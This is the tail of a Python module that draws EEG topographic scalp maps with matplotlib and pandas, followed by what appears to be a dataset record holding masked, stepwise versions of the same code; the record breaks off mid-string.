"""Set y-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_ylim(bottom, top)
self.figure.canvas.draw()
@property
def yscale(self):
"""Return yscale for subplots."""
yscales = [ax.get_yscale() for ax in self._subaxes]
return yscales
@yscale.setter
def yscale(self, value='linear'):
"""Set y-axis limits on all subplots."""
for ax in self._subaxes:
ax.set_yscale(value)
self.figure.canvas.draw()
def auto_ylim(self, xlim=None, yscale='linear'):
"""Return an estimate for a good ylim.
Parameters
----------
xlim : 2-tuple, optional
Limits in (the index of) the data from where the scaling should be
computed.
yscale : linear or log, optional
Scaling of y-axis.
"""
electrodes = [col for col in self.data.columns
if col in ELECTRODES]
if xlim is None:
data = self.data.ix[:, electrodes]
else:
indices = ((self.data.index >= xlim[0]) &
(self.data.index <= xlim[1]))
data = self.data.ix[indices, electrodes]
min_data = data.min().min()
max_data = data.max().max()
abs_max = max(abs(min_data), max_data)
if yscale == 'linear' or yscale == 'symlog':
if min_data >= 0:
ylim = 0, max_data
else:
ylim = -abs_max, abs_max
elif yscale == 'log':
if min_data > 0:
ylim = min_data, max_data
else:
pseudo_zero = abs_max * 10 ** -5
ylim = pseudo_zero, abs_max
else:
raise ValueError('Wrong value to yscale: {}'.format(yscale))
return ylim
def draw(self, type='plot', title=None, xlim=None, ylim=None,
vmin=None, vmax=None,
axis=False, yscale='linear'):
"""Draw all components in multiplot including the data.
Parameters
----------
title : str, optional
Title to put on the plot
xlim : tuple of floats, optional
X-axis limits used for each individual plots
ylim : tuple of floats, optional
Y-axis limits used for each individual plots
"""
self.axes.axis((-1.2, 1.2, -1.2, 1.2))
self.draw_head()
self.draw_inner_head()
self.draw_nose()
self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin,
vmax=vmax, axis=axis, yscale=yscale)
if title is not None:
self.axes.set_title(title)
self.yscale = yscale
def topoplot(data=None, axes=None, method='linear', number_of_contours=10,
title=None, xlim=None, ylim=None):
"""Plot topographic map of the scalp in 2-D circular view.
Draw the colored scalp map based on data in a Pandas Series where
the values are indexed according to electrode name.
Parameters
----------
data : pandas.Series or pandas.DataFrame, optional
Series with values and indexed by electrode names.
methods : str, optional
Interpolation method
number_of_contours : int
Number of contours in the colored plot.
xlim : 2-tuple of floats, optional
Limits of x-axis in multiplot
ylim : 2-tuple of floats, optional
Limits of y-axis in multiplot
References
----------
https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py
http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm
Examples
--------
>>> import matplotlib.pyplot as plt
>>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}
>>> plt.ion()
>>> topo_plot = topoplot(data)
"""
if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:
topo_plot = TopoPlot(data=data, axes=axes)
topo_plot.draw(title=title, method=method,
number_of_contours=number_of_contours)
return topo_plot
elif isinstance(data, pd.DataFrame):
multi_plot = MultiPlot(data=data, axes=axes)
multi_plot.draw(title=title, xlim=xlim, ylim=ylim)
return multi_plot
def show():
"""Show plot."""
plt.show()
def main(args):
"""Handle command-line interface to topographic plot."""
xlim = args['--xlim']
if args['--xlim'] is not None:
xlim = [float(lim) for lim in xlim.split(',')]
if args['<file>'] is None:
topoplot()
else:
filename = args['<file>']
if filename.lower().endswith('.csv'):
from .core import read_csv
df = read_csv(filename, index_col=0)
if args['--transpose']:
df = df.T
if args['--sample-index'] is None:
if args['--center'] is not None:
df = df.center()
topoplot(df, xlim=xlim)
else:
sample_index = int(args['--sample-index'])
series = df.iloc[sample_index - 1, :]
topoplot(series)
else:
exit('Only csv files handled')
plt.show()
if __name__ == '__main__':
from docopt import docopt
main(docopt(__doc__))
|
normal
|
{
"blob_id": "5bd7160b6b2e283e221aeb0a6913e6d13511c1db",
"index": 7073,
"step-1": "<mask token>\n\n\nclass TopoPlot(object):\n <mask token>\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n <mask token>\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n <mask token>\n <mask token>\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TopoPlot(object):\n <mask token>\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, electrode].plot(ax=subaxes, xlim=\n xlim, ylim=ylim)\n if not axis:\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transData)\n line = lines.Line2D((0, 1), (0, 0), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n trans = transforms.blended_transform_factory(\n subaxes.transAxes, subaxes.transAxes)\n line = lines.Line2D((0, 0), (0, 1), transform=\n trans, color=(0, 0, 0))\n subaxes.add_line(line)\n elif type == 'spectrogram':\n spectrum, frequencies, midpoints, axes = plt.specgram(\n self.data.ix[:, electrode], Fs=self.data.\n sampling_rate, vmin=vmin, vmax=vmax, axes=subaxes)\n if xlim is None:\n xlim = midpoints[0], midpoints[-1]\n subaxes.set_xlim(xlim)\n if ylim is None:\n ylim = frequencies[0], frequencies[-1]\n subaxes.set_ylim(ylim)\n else:\n raise ValueError(\"Wrong value for 'type' argument\")\n if not axis:\n subaxes.set_axis_off()\n subaxes.text(0.5, 0.95, electrode, transform=subaxes.\n transAxes, fontweight='bold', va='top', ha='center')\n subaxes.set_yticklabels([])\n subaxes.set_xticklabels([])\n self._subaxes.append(subaxes)\n\n @property\n def xlim(self):\n \"\"\"Return xlim for subplots.\"\"\"\n lim = [ax.get_xlim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @xlim.setter\n def xlim(self, left=None, right=None):\n \"\"\"Set x-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_xlim(left, right)\n self.figure.canvas.draw()\n\n @property\n def ylim(self):\n \"\"\"Return ylim for subplots.\"\"\"\n lim = [ax.get_ylim() for ax in self._subaxes]\n if lim == []:\n lim = None\n return lim\n\n @ylim.setter\n def ylim(self, bottom=None, top=None):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_ylim(bottom, top)\n self.figure.canvas.draw()\n\n @property\n def yscale(self):\n \"\"\"Return yscale for subplots.\"\"\"\n yscales = [ax.get_yscale() for ax in self._subaxes]\n return yscales\n\n @yscale.setter\n def yscale(self, value='linear'):\n \"\"\"Set y-axis limits on all subplots.\"\"\"\n for ax in self._subaxes:\n ax.set_yscale(value)\n self.figure.canvas.draw()\n\n def auto_ylim(self, xlim=None, yscale='linear'):\n \"\"\"Return an estimate for a good ylim.\n\n Parameters\n ----------\n xlim : 2-tuple, optional\n Limits in (the index of) the data from where the scaling should be\n computed.\n yscale : linear or log, optional\n Scaling of y-axis.\n\n \"\"\"\n electrodes = [col for col in self.data.columns if col in ELECTRODES]\n if xlim is None:\n data = self.data.ix[:, electrodes]\n else:\n indices = (self.data.index >= xlim[0]) & (self.data.index <=\n xlim[1])\n data = self.data.ix[indices, electrodes]\n min_data = data.min().min()\n max_data = data.max().max()\n abs_max = max(abs(min_data), max_data)\n if yscale == 'linear' or yscale == 'symlog':\n if min_data >= 0:\n ylim = 0, max_data\n else:\n ylim = -abs_max, abs_max\n elif yscale == 'log':\n if min_data > 0:\n ylim = min_data, max_data\n else:\n pseudo_zero = abs_max * 10 ** -5\n ylim = pseudo_zero, abs_max\n else:\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\n return ylim\n\n def draw(self, type='plot', title=None, xlim=None, ylim=None, vmin=None,\n vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw all components in multiplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n xlim : tuple of floats, optional\n X-axis limits used for each individual plots\n ylim : tuple of floats, optional\n Y-axis limits used for each individual plots\n\n \"\"\"\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.draw_head()\n self.draw_inner_head()\n self.draw_nose()\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin, vmax=\n vmax, axis=axis, yscale=yscale)\n if title is not None:\n self.axes.set_title(title)\n self.yscale = yscale\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TopoPlot(object):\n \"\"\"Topographic plot.\"\"\"\n\n def __init__(self, data=None, axes=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.Series or dict\n Pandas Series with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self.center = np.array((0, 0))\n if isinstance(data, dict):\n self.data = pd.Series(data)\n elif isinstance(data, pd.Series):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n @staticmethod\n def normalize_electrode_name(name):\n \"\"\"Normalize electrode name.\n\n Parameters\n ----------\n name : str\n Name of electrode to be normalized\n\n Examples\n --------\n >>> TopoPlot.normalize_electrode_name('fpz')\n 'Fpz'\n\n >>> TopoPlot.normalize_electrode_name('AFZ')\n 'AFz'\n\n \"\"\"\n return name.upper().replace('FPZ', 'Fpz').replace('Z', 'z')\n\n def draw_electrodes(self):\n \"\"\"Draw electrodes.\"\"\"\n for electrode, position in ELECTRODES.items():\n circle = plt.Circle(self.center + position, radius=0.04, fill=\n True, facecolor=(1, 1, 1))\n self.axes.add_patch(circle)\n position = self.center + position\n self.axes.text(position[0], position[1], electrode,\n verticalalignment='center', horizontalalignment='center',\n size=6)\n\n def draw_head(self):\n \"\"\"Draw outer head.\"\"\"\n circle = plt.Circle(self.center, radius=1, fill=False)\n self.axes.add_patch(circle)\n\n def draw_inner_head(self):\n \"\"\"Draw inner head.\"\"\"\n circle = plt.Circle(self.center, radius=0.8, fill=False)\n self.axes.add_patch(circle)\n\n def draw_nose(self):\n \"\"\"Draw nose.\"\"\"\n nose = plt.Line2D([sin(-0.1), 0, sin(0.1)], [cos(-0.1), 1.1, cos(\n 0.1)], color=(0, 0, 0))\n self.axes.add_line(nose)\n\n def draw_data(self, method='linear', number_of_contours=10):\n \"\"\"Draw countours from provided data.\"\"\"\n if self.data is not None:\n xi, yi = np.mgrid[-1:1:100.0j, -1:1:100.0j]\n points = []\n for electrode in self.data.index:\n name = TopoPlot.normalize_electrode_name(electrode)\n points.append(ELECTRODES[name])\n zi = griddata(points, self.data.values, (xi, yi), method=method)\n if number_of_contours is None:\n number_of_contours = 10\n plt.contourf(xi, yi, zi, number_of_contours)\n\n def draw(self, title=None, method='linear', number_of_contours=None):\n \"\"\"Draw all components in topoplot including the data.\n\n Parameters\n ----------\n title : str, optional\n Title to put on the plot\n methods : str, optional\n Interpolation method\n number_of_contours : int\n Number of contours in the colored plot.\n\n Examples\n --------\n >>> import matplotlib.pyplot as plt\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\n >>> plt.ion()\n >>> topo_plot = TopoPlot(data)\n >>> topo_plot.draw()\n\n \"\"\"\n self.draw_head()\n self.draw_inner_head()\n self.draw_electrodes()\n self.draw_nose()\n self.draw_data(method=method, number_of_contours=number_of_contours)\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\n self.axes.axis('equal')\n if title is not None:\n self.axes.set_title(title)\n\n\nclass MultiPlot(TopoPlot):\n \"\"\"Multiple plots organized topographically.\n\n References\n ----------\n http://www.fieldtriptoolbox.org/reference/ft_multiploter\n\n \"\"\"\n\n def __init__(self, data=None, axes=None, xlim=None, ylim=None):\n \"\"\"Setup defaults.\n\n Parameters\n ----------\n data : Pandas.DataFrame\n Pandas DataFrame with values indexed by electrodes.\n axes : matplotlib.axes.AxesSubplot object\n Axis object to render on.\n\n \"\"\"\n if axes is None:\n self.figure = plt.figure()\n axes = self.figure.gca()\n else:\n self.figure = axes.get_figure()\n self.axes = axes\n self._subaxes = []\n self.xlim = xlim\n self.ylim = ylim\n self.center = np.array((0, 0))\n if isinstance(data, pd.DataFrame):\n self.data = data\n elif data is None:\n self.data = None\n else:\n raise ValueError(\"Wrong type of value for 'data': {}\".format(\n type(data)))\n\n def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\n \"\"\"Add subaxes to currect specified axes.\n\n References\n ----------\n Pablo https://stackoverflow.com/users/2309442/pablo\n\n Pablo's answer to \"Embedding small plots inside subplots in matplotlib\"\n https://stackoverflow.com/questions/17458580/\n\n \"\"\"\n box = ax.get_position()\n width, height = box.width, box.height\n subaxes_box = [(rect[0], rect[1]), (rect[0] + rect[2], rect[1] +\n rect[3])]\n subaxes_display_coords = ax.transData.transform(subaxes_box)\n trans_figure = self.figure.transFigure.inverted()\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\n x, y = subaxes_figure_coords[0, :]\n width, height = subaxes_figure_coords[1, :] - subaxes_figure_coords[\n 0, :]\n subaxes = self.figure.add_axes([x, y, width, height], axis_bgcolor=\n axis_bgcolor)\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\n x_labelsize *= rect[2] ** 0.5\n y_labelsize *= rect[3] ** 0.5\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\n return subaxes\n\n def draw_data(self, type='plot', width=None, height=None, xlim=None,\n ylim=None, vmin=None, vmax=None, axis=False, yscale='linear'):\n \"\"\"Draw data.\n\n Parameters\n ----------\n type : 'plot', 'spectrogram', optional\n Type of plot\n xlim : 2-tuple of floats, optional\n X-axis limits\n ylim : 2-tuple of floats, optional\n Y-axis limits\n vmin : float, optional\n Minimum value for spectrogram colormap\n vmax : float, optional\n Maximum value for spectrogram colormap\n axis : bool, optional\n Determine whether the axis should be shown\n\n \"\"\"\n if self.data is not None:\n if ylim is None:\n if self.ylim is None and type != 'spectrogram':\n ylim = self.auto_ylim(xlim, yscale=yscale)\n else:\n ylim = self.ylim\n if xlim is None:\n xlim = self.xlim\n if vmin is None:\n vmin = 0\n number_of_electrodes = len([electrode for electrode in self.\n data.columns if electrode in ELECTRODES])\n if width is None:\n if number_of_electrodes > 32:\n width = 0.15\n else:\n width = 0.25\n if height is None:\n height = 0.25\n for electrode in self.data.columns:\n if electrode in ELECTRODES:\n x, y = ELECTRODES[electrode]\n subaxes = self.add_subplot_axes(self.axes, [x - width /\n 2, y - height / 2, width, height], axis_bgcolor='w')\n if type == 'plot':\n self.data.ix[:, 